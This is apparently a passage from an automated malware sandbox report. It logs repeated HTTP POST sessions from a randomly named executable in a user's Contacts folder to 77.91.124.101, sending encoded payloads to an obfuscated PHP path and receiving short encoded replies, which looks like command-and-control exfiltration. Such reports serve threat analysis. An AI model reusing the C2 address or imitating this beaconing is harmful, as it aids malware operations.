Nov 21, 2023 04:47:51.809705973 CET	317	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	77.91.124.101	80	192.168.2.5	49750	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:51.409622908 CET	287	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:51.606362104 CET	314	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:51.606614113 CET	317	OUT	Data Raw: 57 5f 5d 5e 5e 58 5a 59 5d 57 55 57 55 5e 57 52 50 5e 58 46 56 55 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W_]^^XZY]WUWU^WRP^XFVUW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^)(Y?*37\,%79+-&-$2V:)?? ,&G''^)#
Nov 21, 2023 04:47:51.809705973 CET	317	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.5	49751	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:52.133124113 CET	318	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:52.332041979 CET	318	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:52.334084988 CET	321	OUT	Data Raw: 52 5a 58 5c 5b 52 5f 5c 5d 57 55 57 55 56 57 52 50 53 58 41 56 52 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZX\[R_\]WUWUVWRPSXAVRWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X([(;>0;\/$&71_?&S0>>30,;!+7,>&G''^)
Nov 21, 2023 04:47:52.540139914 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:52 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	77.91.124.101	80	192.168.2.5	49751	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:52.133124113 CET	318	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:52.332041979 CET	318	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:52.334084988 CET	321	OUT	Data Raw: 52 5a 58 5c 5b 52 5f 5c 5d 57 55 57 55 56 57 52 50 53 58 41 56 52 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZX\[R_\]WUWUVWRPSXAVRWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X([(;>0;\/$&71_?&S0>>30,;!+7,>&G''^)
Nov 21, 2023 04:47:52.540139914 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:52 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.5	49752	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:52.878020048 CET	322	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:53.074857950 CET	322	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:53.075289011 CET	325	OUT	Data Raw: 52 58 5d 59 5e 59 5a 59 5d 57 55 57 55 5a 57 5b 50 5d 58 49 56 51 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RX]Y^YZY]WUWUZW[P]XIVQWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)5?:T></-76+#!'.-&0W.+<,8-.&G''^)7
Nov 21, 2023 04:47:53.278687954 CET	325	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:52 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	77.91.124.101	80	192.168.2.5	49752	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:52.878020048 CET	322	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:53.074857950 CET	322	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:53.075289011 CET	325	OUT	Data Raw: 52 58 5d 59 5e 59 5a 59 5d 57 55 57 55 5a 57 5b 50 5d 58 49 56 51 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RX]Y^YZY]WUWUZW[P]XIVQWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)5?:T></-76+#!'.-&0W.+<,8-.&G''^)7
Nov 21, 2023 04:47:53.278687954 CET	325	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:52 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	77.91.124.101	80	192.168.2.5	49753	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:53.596347094 CET	326	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:53.794019938 CET	326	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:53.794276953 CET	328	OUT	Data Raw: 57 5e 58 51 5b 5b 5a 59 5d 57 55 57 55 5a 57 5b 50 5e 58 48 56 5f 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W^XQ[[ZY]WUWUZW[P^XHV_W]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>(? 4,\79>?"Q0>>V0-89+, /&G''^)7
Nov 21, 2023 04:47:53.998054028 CET	329	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.5	49753	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:53.596347094 CET	326	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:53.794019938 CET	326	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:53.794276953 CET	328	OUT	Data Raw: 57 5e 58 51 5b 5b 5a 59 5d 57 55 57 55 5a 57 5b 50 5e 58 48 56 5f 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W^XQ[[ZY]WUWUZW[P^XHV_W]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>(? 4,\79>?"Q0>>V0-89+, /&G''^)7
Nov 21, 2023 04:47:53.998054028 CET	329	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49716	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:28.852116108 CET	158	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:29.050067902 CET	159	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:29.050301075 CET	161	OUT	Data Raw: 57 5b 5d 5a 5e 5d 5a 5d 5d 57 55 57 55 59 57 55 50 5f 58 44 56 57 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W[]Z^]Z]]WUWUYWUP_XDVWW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'+8)Y?*348% 6)#.S$."V&#%:;(/_8>&G''^)
Nov 21, 2023 04:47:29.257055044 CET	162	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	77.91.124.101	80	192.168.2.5	49716	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:28.852116108 CET	158	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:29.050067902 CET	159	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:29.050301075 CET	161	OUT	Data Raw: 57 5b 5d 5a 5e 5d 5a 5d 5d 57 55 57 55 59 57 55 50 5f 58 44 56 57 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W[]Z^]Z]]WUWUYWUP_XDVWW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'+8)Y?*348% 6)#.S$."V&#%:;(/_8>&G''^)
Nov 21, 2023 04:47:29.257055044 CET	162	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	77.91.124.101	80	192.168.2.5	49754	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:54.317177057 CET	330	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:54.517254114 CET	330	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:54.517621040 CET	332	OUT	Data Raw: 57 5f 5d 5b 5e 59 5a 59 5d 57 55 57 55 56 57 54 50 5d 58 43 56 5e 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W_][^YZY]WUWUVWTP]XCV^WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$);"<.=U'.4[ +0)'.'3=.]!?</>&G''^)
Nov 21, 2023 04:47:54.721622944 CET	333	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.5	49754	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:54.317177057 CET	330	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:54.517254114 CET	330	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:54.517621040 CET	332	OUT	Data Raw: 57 5f 5d 5b 5e 59 5a 59 5d 57 55 57 55 56 57 54 50 5d 58 43 56 5e 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W_][^YZY]WUWUVWTP]XCV^WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$);"<.=U'.4[ +0)'.'3=.]!?</>&G''^)
Nov 21, 2023 04:47:54.721622944 CET	333	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	77.91.124.101	80	192.168.2.5	49755	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:54.726335049 CET	334	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1396 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:54.924632072 CET	334	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:54.924892902 CET	336	OUT	Data Raw: 52 5c 58 5b 5e 59 5a 5f 5d 57 55 57 55 5e 57 5b 50 59 58 45 56 5f 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R\X[^YZ_]WUWU^W[PYXEV_W^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$%X?>3/4- 5_) *$["'W9)(7],.&G''^)
Nov 21, 2023 04:47:55.129759073 CET	339	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:54 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 21 05 27 2c 23 00 20 23 2b 1e 28 3a 07 14 3a 58 2e 44 28 55 35 5f 32 04 34 13 27 17 25 1b 3f 59 2f 05 27 00 2c 56 20 25 33 04 3d 1a 21 5a 0c 1d 25 04 36 5e 27 55 2b 07 23 02 2b 2d 0e 5e 26 22 3f 15 3c 3e 27 16 23 0a 3b 5d 31 30 3c 57 3b 06 31 59 3a 01 3d 18 25 5a 2a 1d 22 3d 23 5f 0c 14 24 08 21 31 02 07 23 33 25 09 21 09 34 15 23 24 2c 0d 24 2d 24 56 25 2b 21 5e 2a 28 0e 56 31 51 20 50 26 29 2c 0a 26 00 23 51 28 3a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: !',# #+(::X.D(U5_24'%?Y/',V %3=!Z%6^'U+#+-^&"?<>'#;]10<W;1Y:=%Z"=#_$!1#3%!4#$,$-$V%+!^(V1Q P&),&#Q(:&T*+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.5	49755	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:54.726335049 CET	334	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1396 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:54.924632072 CET	334	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:54.924892902 CET	336	OUT	Data Raw: 52 5c 58 5b 5e 59 5a 5f 5d 57 55 57 55 5e 57 5b 50 59 58 45 56 5f 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R\X[^YZ_]WUWU^W[PYXEV_W^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$%X?>3/4- 5_) *$["'W9)(7],.&G''^)
Nov 21, 2023 04:47:55.129759073 CET	339	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:54 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 21 05 27 2c 23 00 20 23 2b 1e 28 3a 07 14 3a 58 2e 44 28 55 35 5f 32 04 34 13 27 17 25 1b 3f 59 2f 05 27 00 2c 56 20 25 33 04 3d 1a 21 5a 0c 1d 25 04 36 5e 27 55 2b 07 23 02 2b 2d 0e 5e 26 22 3f 15 3c 3e 27 16 23 0a 3b 5d 31 30 3c 57 3b 06 31 59 3a 01 3d 18 25 5a 2a 1d 22 3d 23 5f 0c 14 24 08 21 31 02 07 23 33 25 09 21 09 34 15 23 24 2c 0d 24 2d 24 56 25 2b 21 5e 2a 28 0e 56 31 51 20 50 26 29 2c 0a 26 00 23 51 28 3a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: !',# #+(::X.D(U5_24'%?Y/',V %3=!Z%6^'U+#+-^&"?<>'#;]10<W;1Y:=%Z"=#_$!1#3%!4#$,$-$V%+!^(V1Q P&),&#Q(:&T*+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.5	49756	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
